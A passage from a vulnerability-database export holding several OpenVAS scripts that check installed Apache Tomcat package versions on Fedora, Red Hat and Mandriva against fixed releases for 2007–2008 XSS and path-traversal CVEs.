WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Tomcat is the servlet container that is used in the official Reference\n Implementation for the Java Servlet and JavaServer Pages technologies.\n The Java Servlet and JavaServer Pages specifications are developed by\n Sun under the Java Community Process.\n\n Tomcat is developed in an open and participatory environment and\n released under the Apache Software License. Tomcat is intended to be\n a collaboration of the best-of-breed developers from around the world.\n We invite you to participate in this open development project. To\n learn more about getting involved, click here.\";\n\ntag_affected = \"tomcat5 on Fedora 9\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00859.html\");\n script_id(860209);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:05:11 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2008-8113\");\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_name( \"Fedora Update for tomcat5 FEDORA-2008-8113\");\n\n script_summary(\"Check for the Version of tomcat5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC9\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat5\", rpm:\"tomcat5~5.5.27~0jpp.2.fc9\", rls:\"FC9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-27T10:56:26", "description": "Check for the Version of tomcat", "cvss3": {}, "published": "2009-03-06T00:00:00", "type": "openvas", "title": "RedHat Update for tomcat RHSA-2008:0648-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-1947", "CVE-2008-2938", "CVE-2008-2370", "CVE-2008-1232"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:870028", "href": "http://plugins.openvas.org/nasl.php?oid=870028", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for tomcat RHSA-2008:0648-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Apache Tomcat is a servlet container for the Java Servlet and JavaServer\n Pages (JSP) technologies.\n\n A cross-site scripting vulnerability was discovered in the\n HttpServletResponse.sendError() method. A remote attacker could inject\n arbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\n An additional cross-site scripting vulnerability was discovered in the host\n manager application. A remote attacker could inject arbitrary web script or\n HTML via the hostname parameter. (CVE-2008-1947)\n\n A traversal vulnerability was discovered when using a RequestDispatcher\n in combination with a servlet or JSP. A remote attacker could utilize a\n specially-crafted request parameter to access protected web resources.\n (CVE-2008-2370)\n\n An additional traversal vulnerability was discovered when the\n "allowLinking" and "URIencoding" settings were activated. A remote attacker\n could use a UTF-8-encoded request to extend their privileges and obtain\n local files accessible to the Tomcat process. (CVE-2008-2938)\n\n Users of tomcat should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"tomcat on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-August/msg00020.html\");\n script_id(870028);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"RHSA\", value: \"2008:0648-01\");\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_name( \"RedHat Update for tomcat RHSA-2008:0648-01\");\n\n script_summary(\"Check for the Version of tomcat\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat5\", rpm:\"tomcat5~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-admin-webapps\", rpm:\"tomcat5-admin-webapps~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-common-lib\", rpm:\"tomcat5-common-lib~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-debuginfo\", rpm:\"tomcat5-debuginfo~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper\", rpm:\"tomcat5-jasper~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper-javadoc\", rpm:\"tomcat5-jasper-javadoc~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp-2.0-api\", rpm:\"tomcat5-jsp-2.0-api~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp-2.0-api-javadoc\", rpm:\"tomcat5-jsp-2.0-api-javadoc~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-server-lib\", rpm:\"tomcat5-server-lib~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet-2.4-api\", rpm:\"tomcat5-servlet-2.4-api~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet-2.4-api-javadoc\", rpm:\"tomcat5-servlet-2.4-api-javadoc~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-webapps\", rpm:\"tomcat5-webapps~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:37", "description": "Check for the Version of tomcat6", "cvss3": {}, "published": "2009-02-17T00:00:00", "type": "openvas", "title": "Fedora Update for tomcat6 FEDORA-2008-7977", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-1947", "CVE-2008-2938", "CVE-2008-2370", "CVE-2008-1232"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:860391", "href": "http://plugins.openvas.org/nasl.php?oid=860391", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tomcat6 FEDORA-2008-7977\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Tomcat is the servlet container that is used in the official Reference\n Implementation for the Java Servlet and JavaServer Pages technologies.\n The Java Servlet and JavaServer Pages specifications are developed by\n Sun under the Java Community Process.\n\n Tomcat is developed in an open and participatory environment and\n released under the Apache Software License version 2.0. Tomcat is intended\n to be a collaboration of the best-of-breed developers from around the world.\";\n\ntag_affected = \"tomcat6 on Fedora 9\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00712.html\");\n script_id(860391);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:03:12 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2008-7977\");\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_name( \"Fedora Update for tomcat6 FEDORA-2008-7977\");\n\n script_summary(\"Check for the Version of tomcat6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC9\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat6\", rpm:\"tomcat6~6.0.18~1.1.fc9\", rls:\"FC9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-09T11:40:43", "description": "Check for the Version of tomcat", "cvss3": {}, "published": "2009-03-06T00:00:00", "type": "openvas", "title": "RedHat Update for tomcat RHSA-2008:0648-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-1947", "CVE-2008-2938", "CVE-2008-2370", "CVE-2008-1232"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310870028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870028", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for tomcat RHSA-2008:0648-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Apache Tomcat is a servlet container for the Java Servlet and JavaServer\n Pages (JSP) technologies.\n\n A cross-site scripting vulnerability was discovered in the\n HttpServletResponse.sendError() method. A remote attacker could inject\n arbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\n An additional cross-site scripting vulnerability was discovered in the host\n manager application. A remote attacker could inject arbitrary web script or\n HTML via the hostname parameter. (CVE-2008-1947)\n\n A traversal vulnerability was discovered when using a RequestDispatcher\n in combination with a servlet or JSP. A remote attacker could utilize a\n specially-crafted request parameter to access protected web resources.\n (CVE-2008-2370)\n\n An additional traversal vulnerability was discovered when the\n "allowLinking" and "URIencoding" settings were activated. A remote attacker\n could use a UTF-8-encoded request to extend their privileges and obtain\n local files accessible to the Tomcat process. (CVE-2008-2938)\n\n Users of tomcat should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"tomcat on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-August/msg00020.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870028\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"RHSA\", value: \"2008:0648-01\");\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_name( \"RedHat Update for tomcat RHSA-2008:0648-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of tomcat\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat5\", rpm:\"tomcat5~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-admin-webapps\", rpm:\"tomcat5-admin-webapps~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-common-lib\", rpm:\"tomcat5-common-lib~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-debuginfo\", rpm:\"tomcat5-debuginfo~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper\", rpm:\"tomcat5-jasper~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper-javadoc\", rpm:\"tomcat5-jasper-javadoc~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp-2.0-api\", rpm:\"tomcat5-jsp-2.0-api~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp-2.0-api-javadoc\", rpm:\"tomcat5-jsp-2.0-api-javadoc~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-server-lib\", rpm:\"tomcat5-server-lib~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet-2.4-api\", rpm:\"tomcat5-servlet-2.4-api~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet-2.4-api-javadoc\", rpm:\"tomcat5-servlet-2.4-api-javadoc~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-webapps\", rpm:\"tomcat5-webapps~5.5.23~0jpp.7.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-24T12:56:32", "description": "Check for the Version of tomcat5", "cvss3": {}, "published": "2009-04-09T00:00:00", "type": "openvas", "title": "Mandriva Update for tomcat5 MDVSA-2008:188 (tomcat5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-5342", "CVE-2008-1947", "CVE-2008-2938", "CVE-2008-2370", "CVE-2008-1232"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:830681", "href": "http://plugins.openvas.org/nasl.php?oid=830681", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for tomcat5 MDVSA-2008:188 (tomcat5)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities have been discovered in the Apache\n Tomcat server:\n\n The default catalina.policy in the JULI logging component did not\n restrict certain permissions for web applications which could allow a\n remote attacker to modify logging configuration options and overwrite\n arbitrary files (CVE-2007-5342).\n \n A cross-site scripting vulnerability was found in the\n HttpServletResponse.sendError() method which could allow a remote\n attacker to inject arbitrary web script or HTML via forged HTTP headers\n (CVE-2008-1232).\n \n A cross-site scripting vulnerability was found in the host manager\n application that could allow a remote attacker to inject arbitrary\n web script or HTML via the hostname parameter (CVE-2008-1947).\n \n A traversal vulnerability was found when using a RequestDispatcher in\n combination with a servlet or JSP that could allow a remote attacker\n to utilize a specially-crafted request parameter to access protected\n web resources (CVE-2008-2370).\n \n A traversal vulnerability was found when the 'allowLinking' and\n 'URIencoding' settings were activated which could allow a remote attacker\n to use a UTF-8-encoded request to extend their privileges and obtain\n local files accessible to the Tomcat process (CVE-2008-2938).\n \n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"tomcat5 on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-09/msg00005.php\");\n script_id(830681);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:26:37 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_xref(name: \"MDVSA\", value: \"2008:188\");\n script_cve_id(\"CVE-2007-5342\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_name( \"Mandriva Update for tomcat5 MDVSA-2008:188 (tomcat5)\");\n\n script_summary(\"Check for the Version of tomcat5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat5\", rpm:\"tomcat5~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-admin-webapps\", rpm:\"tomcat5-admin-webapps~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-common-lib\", rpm:\"tomcat5-common-lib~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper\", rpm:\"tomcat5-jasper~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper-javadoc\", rpm:\"tomcat5-jasper-javadoc~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp\", rpm:\"tomcat5-jsp~2.0~api~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp\", rpm:\"tomcat5-jsp~2.0~api~javadoc~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-server-lib\", rpm:\"tomcat5-server-lib~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet\", rpm:\"tomcat5-servlet~2.4~api~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet\", rpm:\"tomcat5-servlet~2.4~api~javadoc~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-webapps\", rpm:\"tomcat5-webapps~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat5\", rpm:\"tomcat5~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-admin-webapps\", rpm:\"tomcat5-admin-webapps~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-common-lib\", rpm:\"tomcat5-common-lib~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper\", rpm:\"tomcat5-jasper~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper-eclipse\", rpm:\"tomcat5-jasper-eclipse~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper-javadoc\", rpm:\"tomcat5-jasper-javadoc~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp\", rpm:\"tomcat5-jsp~2.0~api~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp\", rpm:\"tomcat5-jsp~2.0~api~javadoc~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-server-lib\", rpm:\"tomcat5-server-lib~5.5.25~1.2.1.1mdv2008.1\", 